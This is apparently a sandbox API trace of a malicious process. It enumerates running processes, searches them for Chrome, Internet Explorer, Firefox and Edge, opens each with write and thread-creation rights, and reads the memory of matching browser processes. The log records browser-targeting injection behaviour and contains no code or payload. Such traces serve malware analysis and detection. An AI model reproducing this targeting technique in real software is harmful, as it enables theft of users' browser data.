	[0243.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.059] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0243.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8b3c
	[0243.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.061] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0243.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.061] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.062] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0243.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.062] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0243.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8b40
	[0243.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.063] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0243.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.064] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.065] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0243.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.066] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0243.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8b44
	[0243.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.067] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0243.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.068] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.068] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0243.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.069] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8b48
	[0243.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.071] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.071] NtQueryInformationProcess (in: ProcessHandle=0x8b48, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.071] ReadProcessMemory (in: hProcess=0x8b48, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.071] ReadProcessMemory (in: hProcess=0x8b48, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.071] ReadProcessMemory (in: hProcess=0x8b48, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.071] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8b4c
	[0243.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.072] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.073] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.073] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.074] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.074] NtQueryInformationProcess (in: ProcessHandle=0x8b4c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.074] ReadProcessMemory (in: hProcess=0x8b4c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.074] ReadProcessMemory (in: hProcess=0x8b4c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.074] ReadProcessMemory (in: hProcess=0x8b4c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.074] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8b50
	[0243.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.075] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.075] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.076] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0243.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8b54
	[0243.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.077] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0243.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0243.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8b58
	[0243.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.079] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.081] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.081] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.081] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8b5c
	[0243.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.083] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.083] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.084] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.084] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8b60
	[0243.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.085] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.086] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.086] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8b64
	[0243.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.087] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8b68
	[0243.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.090] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.090] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.090] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.091] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8b6c
	[0243.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.093] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0243.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8b70
	[0243.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.095] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0243.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.095] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.096] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0243.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.096] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0243.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8b74
	[0243.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.097] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.097] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.098] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.098] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0243.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8b78
	[0243.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.099] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0243.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.099] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.100] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0243.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.100] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8b7c
	[0243.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.101] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.102] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0243.103] CloseHandle (hObject=0x4fd0) returned 1
	[0243.103] Sleep (dwMilliseconds=0x64) 
	[0243.237] GetCurrentProcessId () returned 0x110
	[0243.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0243.239] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0243.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0243.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0243.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8b80
	[0243.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.242] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.242] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.242] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.242] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.243] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8b84
	[0243.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.244] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.244] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.244] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.245] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0243.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8b88
	[0243.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.246] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0243.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.246] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.246] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0243.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.247] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.247] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8b8c
	[0243.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.248] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.248] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.248] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.249] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.249] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
